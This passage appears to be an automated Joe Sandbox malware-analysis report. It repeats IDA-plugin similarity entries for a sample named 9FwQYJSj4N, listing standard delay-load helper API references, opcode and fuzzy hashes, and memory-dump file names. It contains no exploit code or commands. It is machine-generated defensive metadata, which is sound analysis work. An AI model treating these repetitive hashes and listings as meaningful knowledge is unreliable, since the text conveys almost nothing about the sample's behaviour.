                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: db5e44095cfca8316b694d9f7613a421d4d3a6b894ce555e59f04ce81bae2a97
                                                                                    • Instruction ID: 214b5ccabe5881e2da6612996def4f65c0839d7cac0abd53eec8cb7e0c79d2a9
                                                                                    • Opcode Fuzzy Hash: db5e44095cfca8316b694d9f7613a421d4d3a6b894ce555e59f04ce81bae2a97
                                                                                    • Instruction Fuzzy Hash: 58B012C125C0017C31051225DD05E3F110CE6C1D10320502FFCD8D8485F8441C090471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E51F
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 381b0f3a11d8afaeacda62cd2c9cb61de7e628cc1008b2523ab25a5e9c2f912c
                                                                                    • Instruction ID: f3d5b0f25a2af2807c6a16aad00d8d7c9e2131e2e8a46134415b513eb1768e7a
                                                                                    • Opcode Fuzzy Hash: 381b0f3a11d8afaeacda62cd2c9cb61de7e628cc1008b2523ab25a5e9c2f912c
                                                                                    • Instruction Fuzzy Hash: 9CB012C12580417C31055209DE01D3F150CD6C5E10320801FFCCCC8044F8441C060571
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E51F
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 0552bb0130be7ea5cd940134cfc2f664819936d285463b188669d23895cb4607
                                                                                    • Instruction ID: ec1b446e2256414fec000520a2bc2b00fc8a89acfc9aba3322920b64dc83996c
                                                                                    • Opcode Fuzzy Hash: 0552bb0130be7ea5cd940134cfc2f664819936d285463b188669d23895cb4607
                                                                                    • Instruction Fuzzy Hash: 8CB012C125D0017D31055209DD01E3F110CE6C5D10320401FFCCCC8044F8441C050571
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E51F
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 82533edf324cfe08fe29e97db02929a870f99e8d4127d862012a8e034de04721
                                                                                    • Instruction ID: 48dddb407f410e23c0741f0acb087f6f38e95b1055f7b4fea63319daf44a5af7
                                                                                    • Opcode Fuzzy Hash: 82533edf324cfe08fe29e97db02929a870f99e8d4127d862012a8e034de04721
                                                                                    • Instruction Fuzzy Hash: 56B012C12581017C32055209DD02D3F111CD6C5D10320421FFCCCC8044F8442C490571
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E580
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 37958d85ed9fe38fc37bbb065ee2d692b225db84249e03ba4acd200564622c6b
                                                                                    • Instruction ID: 8fb44fcf3c63c1f910765bc11d4ac108cd0da4938601c6152be65d91e6fe641a
                                                                                    • Opcode Fuzzy Hash: 37958d85ed9fe38fc37bbb065ee2d692b225db84249e03ba4acd200564622c6b
                                                                                    • Instruction Fuzzy Hash: CBB012C1659101BD31055155DD01C3F215CE6C4910320401FFCCCCD044F8441C010471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E580
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 47f443136a76a2fbc7649aa477e004317d25a9560b6dd0608c4e8a7f0826e34b
                                                                                    • Instruction ID: c659e16a7fc367c9e1ab855b6dad5d3b15abe5ceffcb597f7a085e14886f150e
                                                                                    • Opcode Fuzzy Hash: 47f443136a76a2fbc7649aa477e004317d25a9560b6dd0608c4e8a7f0826e34b
                                                                                    • Instruction Fuzzy Hash: 3AB012C1658101BC31055155DE01C3F617CD6C4910360421FFCCCCD044FC441C020471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E580
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 00158a2d95572b6dc4d833d746a05f4ea304060907a2976893a73651031a516d
                                                                                    • Instruction ID: 651b7f3e287c08ec764456ea97d10fb58c746e8eb7b4601acd59e52f29ff0e58
                                                                                    • Opcode Fuzzy Hash: 00158a2d95572b6dc4d833d746a05f4ea304060907a2976893a73651031a516d
                                                                                    • Instruction Fuzzy Hash: F3B012C1658201BD31455155DD02C3F217CD6C4910320421FFCCCCD044F8441C410471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: d2fdd046b25d0b4e345de736f29691f8323015c77e7d611ef9f2a746823cbdcf
                                                                                    • Instruction ID: 85aace7adcc5d1cebee061f8371faa6f66f5062e2ab578477d2d35a386104e12
                                                                                    • Opcode Fuzzy Hash: d2fdd046b25d0b4e345de736f29691f8323015c77e7d611ef9f2a746823cbdcf
                                                                                    • Instruction Fuzzy Hash: 8CB012E125C0117C30055105DF05C7F020CD6C4920320C01FFDCCD8044D8441C0E0873
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: e25f19bae1487f1f5352d15acb960f9bc2db343457490e94d94937918796a5f4
                                                                                    • Instruction ID: cd9593717e7ebf2ed828371590bfbdec4d96b695d378a8e419a60867f8becb98
                                                                                    • Opcode Fuzzy Hash: e25f19bae1487f1f5352d15acb960f9bc2db343457490e94d94937918796a5f4
                                                                                    • Instruction Fuzzy Hash: 80B012F165C011FC30059105DD05C3F024CD6C4E10320C01FFCCCD8044D8485D090473
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: cfd9ef1385eed80298058fc83dd0cd72251969832cd92666d8e1b37c4175de2b
                                                                                    • Instruction ID: 350f8d76f511b809350aa210e6c52221da445448b0e8651335ffd5f874c07634
                                                                                    • Opcode Fuzzy Hash: cfd9ef1385eed80298058fc83dd0cd72251969832cd92666d8e1b37c4175de2b
                                                                                    • Instruction Fuzzy Hash: 5BB012E165C011BC30059105DE05C3F020CD6C4920320C01FFCCCD8044D8445C090873
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 87e732825f2394e1ed79d66e9fc1b51656e10546ee8bfd1afa14549787987ae7
                                                                                    • Instruction ID: 6c37eeca4ba4309e90b94170aad58ba3533d9d5d0c9c81a65c5370fd31139fd4
                                                                                    • Opcode Fuzzy Hash: 87e732825f2394e1ed79d66e9fc1b51656e10546ee8bfd1afa14549787987ae7
                                                                                    • Instruction Fuzzy Hash: 71A001E66A91627D710A6652AE0AC7F121DCAD5A25320952EFCA9E8488AC8828461873
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: e892327258928e5e2adf73823c05c4b1db1ce94f789cbca47699410d95870433
                                                                                    • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                                                    • Opcode Fuzzy Hash: e892327258928e5e2adf73823c05c4b1db1ce94f789cbca47699410d95870433
                                                                                    • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 51be4cfe6e200d441e2578d64901c947a372e21c6dd3c4612882c5a1e0a7b637
                                                                                    • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                                                    • Opcode Fuzzy Hash: 51be4cfe6e200d441e2578d64901c947a372e21c6dd3c4612882c5a1e0a7b637
                                                                                    • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 83caaa049db07c3f01617ef2dacdd8d2c7746ee5735d2cf6fb280cc8b18ae367
                                                                                    • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                                                    • Opcode Fuzzy Hash: 83caaa049db07c3f01617ef2dacdd8d2c7746ee5735d2cf6fb280cc8b18ae367
                                                                                    • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 0a2e4bf9a724199ef004c39e9be412b0bd46616a09eb17419bf2f12cdc86c1fa
                                                                                    • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                                                    • Opcode Fuzzy Hash: 0a2e4bf9a724199ef004c39e9be412b0bd46616a09eb17419bf2f12cdc86c1fa
                                                                                    • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
